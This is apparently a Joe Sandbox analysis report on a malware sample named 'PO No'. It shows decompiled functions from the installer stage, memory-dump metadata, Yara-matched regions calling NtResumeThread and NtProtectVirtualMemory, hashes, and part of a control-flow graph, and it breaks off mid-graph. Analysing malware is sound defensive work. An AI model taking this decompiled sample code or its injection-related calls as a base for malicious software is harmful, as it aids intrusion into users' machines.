                                                                      0x00406fc8
                                                                      0x00406fc8
                                                                      0x00406fcd
                                                                      0x00406fcd
                                                                      0x00406fcf
                                                                      0x00406fd2
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00407009
                                                                      0x00407009
                                                                      0x0040700c
                                                                      0x0040700f
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00000000
                                                                      0x00407083
                                                                      0x00407011
                                                                      0x00407017
                                                                      0x0040701a
                                                                      0x0040701d
                                                                      0x00407020
                                                                      0x00407023
                                                                      0x00407026
                                                                      0x00407029
                                                                      0x0040702c
                                                                      0x0040702f
                                                                      0x00407032
                                                                      0x0040704b
                                                                      0x0040704d
                                                                      0x00407050
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407056
                                                                      0x00407059
                                                                      0x0040705b
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407062
                                                                      0x00407065
                                                                      0x00407069
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x0040706c
                                                                      0x0040706f
                                                                      0x00407072
                                                                      0x00407034
                                                                      0x00407034
                                                                      0x0040703c
                                                                      0x00407041
                                                                      0x00407043
                                                                      0x00407046
                                                                      0x00407046
                                                                      0x00407075
                                                                      0x0040707c
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x0040707c
                                                                      0x00406f8f
                                                                      0x00406f92
                                                                      0x00406f94
                                                                      0x00406f97
                                                                      0x00406f9a
                                                                      0x00406f9d
                                                                      0x00406f9f
                                                                      0x00406fa2
                                                                      0x00406fa5
                                                                      0x00406fa5
                                                                      0x00406fa8
                                                                      0x00406fa8
                                                                      0x00406fab
                                                                      0x00406fb2
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00406fb2
                                                                      0x00406f38
                                                                      0x00406f3b
                                                                      0x00406f3d
                                                                      0x00406f40
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e2a
                                                                      0x00406e2a
                                                                      0x00406e2e
                                                                      0x004072f4
                                                                      0x00000000
                                                                      0x004072f4
                                                                      0x00406e34
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e42
                                                                      0x00406e45
                                                                      0x00406e48
                                                                      0x00406e4b
                                                                      0x00406e4e
                                                                      0x00406e51
                                                                      0x00406e52
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e57
                                                                      0x00406e5a
                                                                      0x00406e5d
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e63
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070b1
                                                                      0x004070b4
                                                                      0x004070b7
                                                                      0x004070ba
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bf
                                                                      0x004070c2
                                                                      0x004070c5
                                                                      0x004070c8
                                                                      0x004070cb
                                                                      0x004070ce
                                                                      0x004070cf
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d4
                                                                      0x004070d7
                                                                      0x004070da
                                                                      0x004070dd
                                                                      0x004070e0
                                                                      0x004070e4
                                                                      0x004070e6
                                                                      0x004070e9
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x004070e9
                                                                      0x0040731e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                      • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                                      • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                      • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004066F3(WCHAR* _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = FindFirstFileW(_a4, 0x426778); // executed
                                                                      				if(_t2 == 0xffffffff) {
                                                                      					return 0;
                                                                      				}
                                                                      				FindClose(_t2);
                                                                      				return 0x426778;
                                                                      			}




                                                                      0x004066fe
                                                                      0x00406707
                                                                      0x00000000
                                                                      0x00406714
                                                                      0x0040670a
                                                                      0x00000000

                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75702EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75702EE0), ref: 004066FE
                                                                      • FindClose.KERNEL32(00000000), ref: 0040670A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: xgB
                                                                      • API String ID: 2295610775-399326502
                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                      • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                      • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 67%
                                                                      			E004020FE() {
                                                                      				signed int _t52;
                                                                      				void* _t56;
                                                                      				intOrPtr* _t60;
                                                                      				intOrPtr _t61;
                                                                      				intOrPtr* _t62;
                                                                      				intOrPtr* _t64;
                                                                      				intOrPtr* _t66;
                                                                      				intOrPtr* _t68;
                                                                      				intOrPtr* _t70;
                                                                      				intOrPtr* _t72;
                                                                      				intOrPtr* _t74;
                                                                      				intOrPtr* _t76;
                                                                      				intOrPtr* _t78;
                                                                      				intOrPtr* _t80;
                                                                      				void* _t83;
                                                                      				intOrPtr* _t91;
                                                                      				signed int _t101;
                                                                      				signed int _t105;
                                                                      				void* _t107;
                                                                      
                                                                      				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
                                                                      				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
                                                                      				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
                                                                      				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
                                                                      				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
                                                                      				_t52 =  *(_t107 - 0x18);
                                                                      				 *(_t107 - 0x44) = _t52 & 0x00000fff;
                                                                      				_t101 = _t52 & 0x00008000;
                                                                      				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                      				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                      				if(E00405CF8( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
                                                                      					E00402C37(0x21);
                                                                      				}
                                                                      				_t56 = _t107 + 8;
                                                                      				__imp__CoCreateInstance(0x4084dc, _t83, 1, 0x4084cc, _t56); // executed
                                                                      				if(_t56 < _t83) {
                                                                      					L14:
                                                                      					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                      					_push(0xfffffff0);
                                                                      				} else {
                                                                      					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                      					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
                                                                      					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
                                                                      					if(_t61 >= _t83) {
                                                                      						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                      						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
                                                                      						if(_t101 == _t83) {
                                                                      							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                      							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose\\Circularizations126\\Iltningernes\\Mellivorous");
                                                                      						}
                                                                      						if(_t105 != _t83) {
                                                                      							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                      							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                      						}
                                                                      						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                      						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
                                                                      						_t91 =  *((intOrPtr*)(_t107 - 0x48));
                                                                      						if( *_t91 != _t83) {
                                                                      							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                      							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
                                                                      						}
                                                                      						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                      						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                      						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                      						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                      						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                      							_t74 =  *((intOrPtr*)(_t107 - 0x30));
                                                                      							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
                                                                      						}
                                                                      						_t72 =  *((intOrPtr*)(_t107 - 0x30));
                                                                      						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                      					}
                                                                      					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                      					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                      						_push(0xfffffff4);
                                                                      					} else {
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      				E00401423();
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                      				return 0;
                                                                      			}






















                                                                      0x00402107
                                                                      0x00402111
                                                                      0x0040211b
                                                                      0x00402125
                                                                      0x00402130
                                                                      0x00402133
                                                                      0x0040214d
                                                                      0x00402150
                                                                      0x00402156
                                                                      0x00402159
                                                                      0x00402163
                                                                      0x00402167
                                                                      0x00402167
                                                                      0x0040216c
                                                                      0x0040217d
                                                                      0x00402185
                                                                      0x0040223c
                                                                      0x0040223c
                                                                      0x00402243
                                                                      0x0040218b
                                                                      0x0040218b
                                                                      0x0040219a
                                                                      0x0040219e
                                                                      0x004021a1
                                                                      0x004021a7
                                                                      0x004021b5
                                                                      0x004021b8
                                                                      0x004021ba
                                                                      0x004021c5
                                                                      0x004021c5
                                                                      0x004021ca
                                                                      0x004021cc
                                                                      0x004021d3
                                                                      0x004021d3
                                                                      0x004021d6
                                                                      0x004021df
                                                                      0x004021e2
                                                                      0x004021e8
                                                                      0x004021ea
                                                                      0x004021f4
                                                                      0x004021f4
                                                                      0x004021f7
                                                                      0x00402200
                                                                      0x00402203
                                                                      0x0040220c
                                                                      0x00402212
                                                                      0x00402214
                                                                      0x00402222
                                                                      0x00402222
                                                                      0x00402225
                                                                      0x0040222b
                                                                      0x0040222b
                                                                      0x0040222e
                                                                      0x00402234
                                                                      0x0040223a
                                                                      0x0040224f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040223a
                                                                      0x00402245
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                      Strings
                                                                      • C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous, xrefs: 004021BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous
                                                                      • API String ID: 542301482-1754102795
                                                                      • Opcode ID: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                                      • Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
                                                                      • Opcode Fuzzy Hash: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                                      • Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: u3XW
                                                                      • API String ID: 0-3706046320
                                                                      • Opcode ID: 595061216132d1dfae177d300a5dcedb4a63716362654cf178997826d0b937a2
                                                                      • Instruction ID: 377959a71a4163504eaf4d32bbd0956ab21f2e62993fcaffd3559a7a5d332a24
                                                                      • Opcode Fuzzy Hash: 595061216132d1dfae177d300a5dcedb4a63716362654cf178997826d0b937a2
                                                                      • Instruction Fuzzy Hash: EDF1567070475A8FEF349E79CDE47DA37A2EF99360F948129CD89DB245E33099868B01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: W!Nz
                                                                      • API String ID: 0-2419801721
                                                                      • Opcode ID: 945d5c95602498307653c882b369865a70e863d21aad018a74b48fbc095490f9
                                                                      • Instruction ID: 401e58a8136771bcf778b1eeece1fd85a55c31ab7bb7cf17e70526c011168126
                                                                      • Opcode Fuzzy Hash: 945d5c95602498307653c882b369865a70e863d21aad018a74b48fbc095490f9
                                                                      • Instruction Fuzzy Hash: 70B1757170434A9FEB348E69CAD87DB37A2EF993A0F85413EDD89DB204E33099468741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtResumeThread.NTDLL(00000001,041463AA,51DA0361,00000000), ref: 0414577D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 29f88f88a05789de33aad368408d46515edd24ee14ed1b2d1a356a55d797bbee
                                                                      • Instruction ID: 04dc49fbbdac25d85b1107e7e66eb2fc29656114d5369bb8c068c02e7311e075
                                                                      • Opcode Fuzzy Hash: 29f88f88a05789de33aad368408d46515edd24ee14ed1b2d1a356a55d797bbee
                                                                      • Instruction Fuzzy Hash: 19018130704246EFDB2C8E64CAD83D93763AFC8259F164539CE068B604E734AA049B10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtProtectVirtualMemory.NTDLL(259A489A,?,?,?,?,04143450), ref: 04144431
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MemoryProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 2706961497-0
                                                                      • Opcode ID: 81d34e672548a2134b8a59140234c4e988ae0cb41106cd6a8be6ab3089431d4d
                                                                      • Instruction ID: 890df5d8a450b7d9f31d0a6b50f4a46a31deb1b17ad838e911e3290e5b4f551e
                                                                      • Opcode Fuzzy Hash: 81d34e672548a2134b8a59140234c4e988ae0cb41106cd6a8be6ab3089431d4d
                                                                      • Instruction Fuzzy Hash: BC01FB71B046859FDB68DE2CCD847DE76E6AFC8700F15C029EC49EB204D6749A458B11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 41%
                                                                      			E00402862(short __ebx, short* __esi) {
                                                                      				void* _t8;
                                                                      				void* _t21;
                                                                      
                                                                      				_t8 = FindFirstFileW(E00402C37(2), _t21 - 0x2d4); // executed
                                                                      				if(_t8 != 0xffffffff) {
                                                                      					E004062F7( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                      					_push(_t21 - 0x2a8);
                                                                      					_push(__esi);
                                                                      					E004063B0();
                                                                      				} else {
                                                                      					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                      					 *__esi = __ebx;
                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                      				return 0;
                                                                      			}





                                                                      0x00402871
                                                                      0x0040287a
                                                                      0x00402895
                                                                      0x004028a0
                                                                      0x004028a1
                                                                      0x004029db
                                                                      0x0040287c
                                                                      0x0040287f
                                                                      0x00402882
                                                                      0x00402885
                                                                      0x00402885
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                                      • Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
                                                                      • Opcode Fuzzy Hash: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                                      • Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57f182be7588573182e7ffeb5211995c6e61846e1c1c0bb71ed520178e4f393a
                                                                      • Instruction ID: e904e54999fdb5ac2922f24f0448d802a0e0c548c33533a336226ab27d621c09
                                                                      • Opcode Fuzzy Hash: 57f182be7588573182e7ffeb5211995c6e61846e1c1c0bb71ed520178e4f393a
                                                                      • Instruction Fuzzy Hash: C5C19E31B0034AEFDF309E288DE57DA37E6AF55360F964129DC89D7245E3319A85CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c9445e2defbb9c9dfb93cfc3237739492f44951b764ad7e15b0bfc0f012cd0aa
                                                                      • Instruction ID: 555416c7fa666014c7fccf9dd5cf11cae15c048fe27f0e5a5241eea7c4701549
                                                                      • Opcode Fuzzy Hash: c9445e2defbb9c9dfb93cfc3237739492f44951b764ad7e15b0bfc0f012cd0aa
                                                                      • Instruction Fuzzy Hash: D9B1487564434ADFDF34AE689DA47DA37A2EFA93A0F84402DDCCDD7201E73199828B01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ee432976adc2e5637762279a6a7690f26d6de7199a8a40bc49c24bb001fc8881
                                                                      • Instruction ID: 77ebc62ef2e2e206f1aa8103fda2d2f81fb3be1c773a1e359600c03906b089f7
                                                                      • Opcode Fuzzy Hash: ee432976adc2e5637762279a6a7690f26d6de7199a8a40bc49c24bb001fc8881
                                                                      • Instruction Fuzzy Hash: D7A1BB30A0034AEFDB349E6C8DD57DA37E2AF56360F96416ADC89DB605E3319A868701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 800f992a52fdb092e7311b7b304f7ddd1350ea0daa7d26b708b96eeb89a172a1
                                                                      • Instruction ID: 0e669268886c7505b8d91e095ec18d69af1c28ecdec86304e8a98ffe24c7d11d
                                                                      • Opcode Fuzzy Hash: 800f992a52fdb092e7311b7b304f7ddd1350ea0daa7d26b708b96eeb89a172a1
                                                                      • Instruction Fuzzy Hash: A541037470474AAFEB349E6D8DD47DA27E1EF993A0F808129EC8DDB205E7309A458701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 261 403e6c-403e7e 262 403e84-403e8a 261->262 263 403fbf-403fce 261->263 262->263 264 403e90-403e99 262->264 265 403fd0-404018 GetDlgItem * 2 call 404345 SetClassLongW call 40140b 263->265 266 40401d-404032 263->266 267 403e9b-403ea8 SetWindowPos 264->267 268 403eae-403eb1 264->268 265->266 270 404072-404077 call 404391 266->270 271 404034-404037 266->271 267->268 273 403eb3-403ec5 ShowWindow 268->273 274 403ecb-403ed1 268->274 280 40407c-404097 270->280 276 404039-404044 call 401389 271->276 277 40406a-40406c 271->277 273->274 281 403ed3-403ee8 DestroyWindow 274->281 282 403eed-403ef0 274->282 276->277 292 404046-404065 SendMessageW 276->292 277->270 279 404312 277->279 287 404314-40431b 279->287 285 4040a0-4040a6 280->285 286 404099-40409b call 40140b 280->286 288 4042ef-4042f5 281->288 290 403ef2-403efe SetWindowLongW 282->290 291 403f03-403f09 282->291 295 4042d0-4042e9 DestroyWindow EndDialog 285->295 296 4040ac-4040b7 285->296 286->285 288->279 294 4042f7-4042fd 288->294 290->287 297 403fac-403fba call 4043ac 291->297 298 403f0f-403f20 GetDlgItem 291->298 292->287 294->279 302 4042ff-404308 ShowWindow 294->302 295->288 296->295 303 4040bd-40410a call 4063d2 call 404345 * 3 GetDlgItem 296->303 297->287 299 403f22-403f39 SendMessageW IsWindowEnabled 298->299 300 403f3f-403f42 298->300 299->279 299->300 304 403f44-403f45 300->304 305 403f47-403f4a 300->305 302->279 331 404114-404150 ShowWindow KiUserCallbackDispatcher call 404367 EnableWindow 303->331 332 40410c-404111 303->332 308 403f75-403f7a call 40431e 304->308 309 403f58-403f5d 305->309 310 403f4c-403f52 305->310 308->297 312 403f93-403fa6 SendMessageW 309->312 314 403f5f-403f65 309->314 310->312 313 403f54-403f56 310->313 312->297 313->308 317 403f67-403f6d call 40140b 314->317 318 403f7c-403f85 call 40140b 314->318 329 403f73 317->329 318->297 327 403f87-403f91 318->327 327->329 329->308 335 404152-404153 331->335 336 404155 331->336 332->331 337 404157-404185 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404187-404198 SendMessageW 337->338 339 40419a 